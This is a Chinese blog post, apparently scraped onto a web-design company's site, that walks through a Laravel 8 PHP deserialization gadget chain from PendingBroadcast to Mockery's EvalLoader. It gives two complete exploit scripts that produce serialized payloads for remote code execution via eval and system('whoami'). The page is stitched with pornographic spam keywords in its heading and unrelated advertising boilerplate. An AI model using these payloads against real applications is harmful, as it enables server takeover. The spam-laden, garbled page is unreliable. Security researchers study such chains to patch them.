bl双性强迫侵犯h_国产在线观看人成激情视频_蜜芽188_被诱拐的少孩全彩啪啪漫画

Laravel8中怎么實現反序列化

本篇文章為大家展示了Laravel 8中怎么實現反序列化,內容簡明扼要并且容易理解,絕對能使你眼前一亮,通過這篇文章的詳細介紹希望你能有所收獲。

本篇文章為大家展示了Laravel 8中怎么實現反序列化,內容簡明扼要并且容易理解,絕對能使你眼前一亮,通過這篇文章的詳細介紹希望你能有所收獲。

text

公司主營業務:成都做網站、網站建設、移動網站開發等業務。幫助企業客戶真正實現互聯網宣傳,提高企業的競爭能力。創新互聯建站是一支青春激揚、勤奮敬業、活力青春激揚、勤奮敬業、活力澎湃、和諧高效的團隊。公司秉承以“開放、自由、嚴謹、自律”為核心的企業文化,感謝他們對我們的高要求,感謝他們從不同領域給我們帶來的挑戰,讓我們激情的團隊有機會用頭腦與智慧不斷的給客戶帶來驚喜。創新互聯建站推出化州免費做網站回饋大家。

首先還是老樣子,熟悉laravel的pop鏈的師傅肯定比較熟悉,入口點還是PendingBroadcast.php中的析構函數;

public function __destruct(){    $this->events->dispatch($this->event);}

這里很明顯可以控制任意類下的dispatch函數;這里還是選擇Dispatcher.php進行續鏈;

public function dispatch($command){    return $this->queueResolver && $this->commandShouldBeQueued($command)                    ? $this->dispatchToQueue($command)                    : $this->dispatchNow($command);}

這里簡單的看下源碼,感興趣的師傅可以拿著laravel5的源碼來進行對比,這里只不過是寫成了三元運算的形式,本質上還是一樣的,我們控制queueResolver變量和commandShouldBeQueued函數,使其返回為真,這樣就可進入dispatchToQueue函數;這里審計下類不難發現queueResolver是我們可控的變量,然而commandShouldBeQueued函數我們可以追溯一下;

protected function commandShouldBeQueued($command){    return $command instanceof ShouldQueue;}

這里不難發現,是需要我們的command是繼承ShouldQueue接口的類就可;所以全局搜索;選擇BroadcastEvent.php的類;然后便可返回true,然后進入dispatchToQueue函數;回溯一下dispatchToQueue函數;

public function dispatchToQueue($command)    {        $connection = $command->connection ?? null;        $queue = call_user_func($this->queueResolver, $connection);

可以發現這里有個危險函數call_user_func;可以直接實現任意類下的任意方法;這里就可直接跳轉到我們想要執行的方法下;全局搜索一下eval方法;發現存在;

class EvalLoader implements Loader{    public function load(MockDefinition $definition)    {        if (class_exists($definition->getClassName(), false)) {            return;        }        eval("?>" . $definition->getCode());    }}

call_user_func函數在第一個參數為數組的時候,第一個參數就是我們選擇的類,第二個參數是類下的方法;所以這里直接去到EvalLoader類,去執行load方法從而調用到eval函數;這里發現存在參數,而且參數必須是MockDefinition類的實例;也即是意味著我們connection需要為MockDefinition類的實例;

繼續審計發現,必須if為false才會觸發eval方法;所以這里我們需要直接追溯到MockDefinition類中;

class MockDefinition{    protected $config;    protected $code;    public function __construct(MockConfiguration $config, $code)    {        if (!$config->getName()) {            throw new \InvalidArgumentException("MockConfiguration must contain a name");        }        $this->config = $config;        $this->code = $code;    }    public function getConfig()    {        return $this->config;    }    public function getClassName()    {        return $this->config->getName();    }    public function getCode()    {        return $this->code;    }}

看下getClassName函數;這里的config是可控的,所以我們直接找到一個存在getName方法并且可控該方法的類;全局搜索下找到MockConfiguration.php可以實現;

protected $name;    public function getName()    {        return $this->name;    }

因為最后是要經過class_exit函數的判斷的,所以我們可以直接控制其返回一個不存在的類,就會造成false從而進入eval方法;繼續回到eval方法;

class EvalLoader implements Loader{    public function load(MockDefinition $definition)    {        if (class_exists($definition->getClassName(), false)) {            return;        }        eval("?>" . $definition->getCode());    }}

這里還有個getCode方法,我們通過上面的類也可審計getCode方法;code在MockDefinition類中也是可控的,所以我們可以隨意的控制其內容,那么我們就可命令執行;放出我exp:

<?phpnamespace Illuminate\Broadcasting{use Illuminate\Contracts\Events\Dispatcher;class PendingBroadcast{ protected $event; protected $events;    public function __construct($events, $event)    {        $this->event = $event;        $this->events = $events;    }}}namespace Illuminate\Bus{class Dispatcher{ protected $queueResolver;    public function __construct($queueResolver)    {        $this->queueResolver = $queueResolver;    }}}namespace Illuminate\Broadcasting{class BroadcastEvent{ public $connection; public function __construct($connection)    {        $this->connection = $connection;    } }}namespace Mockery\Loader{use Mockery\Generator\MockDefinition;class EvalLoader{     public function load(MockDefinition $definition)    {}}}namespace Mockery\Generator{class MockConfiguration{ protected $name; public function __construct($name){ $this->name = $name;}}}namespace Mockery\Generator{class MockDefinition{ protected $config; protected $code; public function __construct($config,$code)    {     $this->config = $config;     $this->code = $code;    }}}namespace{ $e = new Mockery\Generator\MockConfiguration('s1mple'); $d = new Mockery\Loader\EvalLoader(); $f = new Mockery\Generator\MockDefinition($e,'<?php phpinfo();?>'); $c = new Illuminate\Broadcasting\BroadcastEvent($f); $a = new Illuminate\Bus\Dispatcher(array($d,"load")); $b = new Illuminate\Broadcasting\PendingBroadcast($a,$c); echo urlencode(serialize($b));}

這里為了節省時間,我最后用abcdef直接代替了,造成rce;

細心的師傅想必也發現了;在最開始的call_user_func處,也是可以進行命令執行的;

public function dispatchToQueue($command)    {        $connection = $command->connection ?? null;        $queue = call_user_func($this->queueResolver, $connection);

這里可以直接控制進行命令執行;這個很簡單,就直接放出我exp吧;

<?phpnamespace Illuminate\Broadcasting{use Illuminate\Contracts\Events\Dispatcher;class PendingBroadcast{ protected $event; protected $events;    public function __construct($events, $event)    {        $this->event = $event;        $this->events = $events;    }}}namespace Illuminate\Bus{class Dispatcher{ protected $queueResolver;    public function __construct($queueResolver)    {        $this->queueResolver = $queueResolver;    }}}namespace Illuminate\Broadcasting{class BroadcastEvent{ public $connection; public function __construct($connection)    {        $this->connection = $connection;    } }}namespace{ $c = new Illuminate\Broadcasting\BroadcastEvent('whoami'); $a = new Illuminate\Bus\Dispatcher('system'); $b = new Illuminate\Broadcasting\PendingBroadcast($a,$c); echo urlencode(serialize($b));}

網頁標題:Laravel8中怎么實現反序列化
當前鏈接:http://vcdvsql.cn/article40/cipoho.html

成都網站建設公司_創新互聯,為您提供做網站云服務器用戶體驗Google網站制作網站策劃

廣告

聲明:本網站發布的內容(圖片、視頻和文字)以用戶投稿、用戶轉載內容為主,如果涉及侵權請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網站立場,如需處理請聯系客服。電話:028-86922220;郵箱:631063699@qq.com。內容未經允許不得轉載,或轉載時需注明來源: 創新互聯

小程序開發